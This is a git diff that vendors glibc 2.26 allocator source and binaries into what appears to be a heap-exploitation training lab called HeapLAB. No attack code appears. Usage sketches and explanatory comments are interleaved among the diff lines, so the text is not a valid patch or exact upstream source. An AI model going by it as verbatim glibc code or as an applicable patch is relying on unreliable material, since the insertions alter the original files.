+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
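
A usage sketch of the public mallopt() interface that these do_set_* helpers back; the parameters below are handled in the switch above, and per the helpers, touching the mmap or trim settings also sets no_dyn_threshold, switching off the dynamic mmap threshold afterwards:

    #include <malloc.h>
    #include <stdlib.h>

    int main(void)
    {
        /* Requests of roughly 64 KiB and up become candidates for mmap()
           instead of being carved out of an arena. */
        mallopt(M_MMAP_THRESHOLD, 64 * 1024);

        /* A trim threshold of -1 (i.e. SIZE_MAX after conversion) keeps
           sbrk memory from ever being returned to the kernel. */
        mallopt(M_TRIM_THRESHOLD, -1);

        void *p = malloc(256 * 1024);   /* typically served by mmap() now */
        free(p);
        return 0;
    }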
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the ALIGNMENT argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
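
A usage sketch of the wrapper above; posix_memalign() reports problems through its return value (EINVAL for a bad alignment, ENOMEM when allocation fails) and leaves errno alone:

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *buf = NULL;

        /* The alignment must be a power-of-two multiple of sizeof (void *),
           which is exactly the test performed in __posix_memalign. */
        int rc = posix_memalign(&buf, 64, 1024);
        if (rc != 0) {
            fprintf(stderr, "posix_memalign: error %d\n", rc);
            return 1;
        }

        printf("%p is 64-byte aligned\n", buf);
        free(buf);
        return 0;
    }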
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+          fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
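
A usage sketch of the exported malloc_info() entry point; as the check at the top of the function shows, options must currently be 0, and the output is the XML document assembled above:

    #include <malloc.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        void *p = malloc(4096);

        /* Dump per-arena fastbin and bin statistics as XML to stdout. */
        if (malloc_info(0, stdout) != 0)
            perror("malloc_info");

        free(p);
        return 0;
    }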
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.26/ld-2.26.so b/HeapLAB/.glibc/glibc_2.26/ld-2.26.so
new file mode 100755
index 0000000..c1910a6
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26/ld-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26/ld.so.2 b/HeapLAB/.glibc/glibc_2.26/ld.so.2
new file mode 120000
index 0000000..82c5fee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/ld.so.2
@@ -0,0 +1 @@
+ld-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26/libc-2.26.so b/HeapLAB/.glibc/glibc_2.26/libc-2.26.so
new file mode 100755
index 0000000..a958085
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26/libc-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26/libc.so.6 b/HeapLAB/.glibc/glibc_2.26/libc.so.6
new file mode 120000
index 0000000..898455f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/libc.so.6
@@ -0,0 +1 @@
+libc-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
new file mode 100644
index 0000000..54e406b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
@@ -0,0 +1,5655 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  Linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., the number of extra bytes
+       allocated beyond what was requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification.
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
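+
+/* Illustrative example (not from the upstream sources), assuming a typical
+   64-bit build where SIZE_SZ == 8, MALLOC_ALIGNMENT == 16 and MINSIZE == 32,
+   so the macros above give
+
+     tidx2usize (0)     == 0 * 16 + 32 - 8        == 24
+     csize2tidx (0x20)  == (0x20  - 32 + 15) / 16 == 0
+     csize2tidx (0x110) == (0x110 - 32 + 15) / 16 == 15
+
+   i.e. malloc(24) and malloc(0x100) are served from tcache bins 0 and 15
+   respectively, matching the bin table in the comment above.  */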
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
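+
+/* Minimal sketch of a MORECORE-compatible routine (illustrative only, not
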